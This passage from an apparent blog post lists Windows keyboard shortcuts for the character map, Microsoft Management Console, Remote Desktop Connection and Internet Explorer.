HOME (Move to the beginning of the line)
END (Move to the end of the line)
CTRL+HOME (Move to the first character)
CTRL+END (Move to the last character)
SPACEBAR (Switch between Enlarged and Normal mode when a character is selected)
Microsoft Management Console (MMC) Main Window Keyboard Shortcuts
CTRL+O (Open a saved console)
CTRL+N (Open a new console)
CTRL+S (Save the open console)
CTRL+M (Add or remove a console item)
CTRL+W (Open a new window)
F5 key (Update the content of all console windows)
ALT+SPACEBAR (Display the MMC window menu)
ALT+F4 (Close the console)
ALT+A (Display the Action menu)
ALT+V (Display the View menu)
ALT+F (Display the File menu)
ALT+O (Display the Favorites menu)
MMC Console Window Keyboard Shortcuts
CTRL+P (Print the current page or active pane)
ALT+Minus sign (-) (Display the window menu for the active console window)
SHIFT+F10 (Display the Action shortcut menu for the selected item)
F1 key (Open the Help topic, if any, for the selected item)
F5 key (Update the content of all console windows)
CTRL+F10 (Maximize the active console window)
CTRL+F5 (Restore the active console window)
ALT+ENTER (Display the Properties dialog box, if any, for the selected item)
F2 key (Rename the selected item)
CTRL+F4 (Close the active console window. When a console has only one console window, this shortcut closes the console)
Remote Desktop Connection Navigation
CTRL+ALT+END (Open the Microsoft Windows NT Security dialog box)
ALT+PAGE UP (Switch between programs from left to right)
ALT+PAGE DOWN (Switch between programs from right to left)
ALT+INSERT (Cycle through the programs in most recently used order)
ALT+HOME (Display the Start menu)
CTRL+ALT+BREAK (Switch the client computer between a window and a full screen)
ALT+DELETE (Display the Windows menu)
CTRL+ALT+Minus sign (-) (Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PRINT SCREEN on a local computer.)
CTRL+ALT+Plus sign (+) (Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing ALT+PRINT SCREEN on a local computer.)
Microsoft Internet Explorer Navigation
CTRL+B (Open the Organize Favorites dialog box)
CTRL+E (Open the Search bar)
CTRL+F (Start the Find utility)
CTRL+H (Open the History bar)
CTRL+I (Open the Favorites bar)
CTRL+L (Open the Open dialog box)
CTRL+N (Start another instance of the browser with the same Web address)
CT
RL+O (Open the Open dialog box, the same as CTRL+L)
CTRL+P (Open the Print dialog box)
CTRL+R (Update the current Web page)
CTRL+W (Close the current window)
Subscribe to:
Posts (Atom)